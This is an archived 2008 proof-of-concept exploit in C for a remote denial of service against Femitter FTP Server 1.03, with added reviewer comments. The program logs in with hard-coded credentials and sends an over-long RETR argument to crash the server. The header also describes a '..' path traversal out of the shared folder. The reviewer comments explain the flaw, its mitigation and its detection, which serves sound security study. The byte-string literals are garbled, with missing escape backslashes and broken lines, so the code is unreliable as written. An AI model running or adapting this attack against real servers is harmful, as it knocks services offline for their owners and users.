
fermitter-dos.txt

Posted on 18 September 2008

/*
 * Femitter FTP Server 1.03 (RETR) Remote Denial of Service Exploit PoC
 *
 * Summary: Femitter Server is an easy-to-use HTTP and FTP server application
 * for Windows which allows you to use your own computer for sharing gigabytes
 * of files with your friends and colleagues.
 *
 * Desc: Femitter HTTP/FTP 1.03 suffers from a denial of service vulnerability
 * and memory corruption that causes the application to crash. When we send to
 * the RETR command an argument like AAAA:AAAA or an overly long string of As
 * (1024), the server crashes instantly. Also, when typing into browser:
 * ftp://127.0.0.1/.. we traverse to the install folder of the program (CWD),
 * and when browsing to ftp://127.0.0.1/../.. we get access violation at
 * address 004A218A in module "fem.exe". Write of address 00000000.
 *
 * Product's web page: http://acritum.com/fem/index.htm
 *
 * Tested on Microsoft Windows XP SP2 (English)
 *
 * Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
 *
 * liquidworm [t00t] gmail.com
 *
 * http://www.zeroscience.org/
 *
 * 17.09.2008
 *
 * Reviewer notes:
 *  - The description covers three distinct inputs: a RETR argument containing
 *    a colon, an over-long RETR argument, and ".." path components that leave
 *    the shared root. All three are failures of the server to validate a
 *    client-supplied path. The ".." case exposes the install folder, which is
 *    an access-control problem independent of the crash.
 *  - The access violation quoted above (write to address 00000000) is reported
 *    for the "../.." request; no crash details are given for the RETR case.
 *  - This program logs in (USER/PASS) before sending RETR, so the path it
 *    exercises is post-authentication. Whether an unauthenticated or anonymous
 *    session reaches the same code is not shown here.
 *  - No fixed version is named on this page. Exposure is reduced by keeping
 *    the service off untrusted networks and by removing weak or shared
 *    accounts. FTP logs or network inspection can flag RETR arguments that
 *    are unusually long or that contain ':' or ".." components.
 *  - NOTE(review): the string literals below are reproduced exactly as they
 *    appear on this page, which looks damaged by text extraction (escape
 *    sequences and line endings inside literals). Treat the listing as a
 *    record of the issue rather than as buildable code.
 */

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>

/*
 * Alternative request body. It is referenced only by the commented-out send()
 * near the end of main(), so it is never transmitted as written. Presumably it
 * is the short "AAAA:AAAA" form of the RETR argument that the header mentions.
 */
#define MANA "x52x45x54x52x20x41x41x41x41x3Ax41x41x41x41xDxA"

void header(void);

/*
 * Entry point. Expects exactly two arguments, an IPv4 address and a TCP port.
 * It opens one TCP connection, writes a USER line, a PASS line and then the
 * `payload` buffer, and closes the socket.
 *
 * The program never reads from the socket. Login success, server replies and
 * the final state of the server are therefore never observed, and every
 * progress message is printed unconditionally.
 *
 * Returns EXIT_SUCCESS on a usage error, 1 if socket() or connect() fails,
 * and 0 otherwise.
 */
int main (int argc, char *argv[])
{
    int sckt = 0, sfd = 0;

    /*
     * Credentials are hard-coded by the author. The page does not say whether
     * they are product defaults or an account created for the test.
     */
    char user[] = "USER admin ";
    char pass[] = "PASS nimda ";

    /*
     * Request body passed to send(). The header comment describes it as RETR
     * followed by an overly long run of 'A' characters (1024).
     */
    unsigned char payload[]=
        "x52x45x54x52x20x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
        "x41x41x41xDxA";

    /* The banner is printed before the argument check, so it also appears on a usage error. */
    header();

    if(argc != 3)
    {
        printf(" Usage: %s [ip] [port] ", argv[0]);
        /* A usage error exits with a success status. */
        return (EXIT_SUCCESS);
    }

    struct sockaddr_in dos_ftp;

    sfd = socket(AF_INET, SOCK_STREAM, 0);

    if(sfd < 0)
    {
        perror("Socket");
        printf("Error creating socket... ");
        return(1);
    }

    printf(" [+] Socket created! ");

    sleep (1);

    /* Build the destination from argv. Neither the address nor the port is validated. */
    memset(&dos_ftp, 0x0, sizeof(dos_ftp));
    dos_ftp.sin_family = AF_INET;
    dos_ftp.sin_addr.s_addr = inet_addr(argv[1]);
    dos_ftp.sin_port = htons(atoi(argv[2]));

    sckt = connect(sfd, (struct sockaddr *) &dos_ftp, sizeof(dos_ftp));

    if(sckt < 0)
    {
        perror("Connect");
        printf("Error connecting... ");
        return(1);
    }

    printf("[+] Connection established! ");

    sleep (1);

    /*
     * Login sequence. The return values of write() are ignored and no server
     * reply is read, so a rejected login is not detected.
     */
    write(sfd, user, strlen(user)); // username

    printf("[+] Sending CMD: %s ", user);

    sleep (2);

    write(sfd, pass, strlen(pass)); // password

    printf("[+] Sending CMD: %s ", pass);

    sleep (2);

    /* The line break inside the next literal is present on the page and is kept as-is. */
    printf("[+] Sending malicious buffer to %s on port %s ... 
", argv[1], argv[2]);

    sleep(2);

    /*
     * sizeof(payload) is the size of the whole array, so the terminating NUL
     * byte of the initializer is transmitted as well. The return value of
     * send() is not checked.
     */
    send(sfd, payload, sizeof(payload), 0);

    // send(sfd, MANA, sizeof(MANA),0);

    printf("[+] Malicious buffer succesfully sent... ");

    sleep (1);

    /*
     * Printed unconditionally. Nothing above checks the server's state, so
     * this message is not evidence that the service actually went down.
     */
    printf("[+] Femitter FTP Server v1.03 on %s has crashed! ", argv[1]);

    close (sfd);

    return(0);
}

/* Prints the four-line banner with the tool title and the author's contact. No parameters, no return value. */
void header()
{
    printf(" ******************************************************************************** ");
    printf(" Femitter FTP Server 1.03 (RETR) Remote Denial of Service Exploit PoC ");
    printf(" by LiquidWorm <liquidworm [t00t] gmail.com> ");
    printf("******************************************************************************** ");
}

 
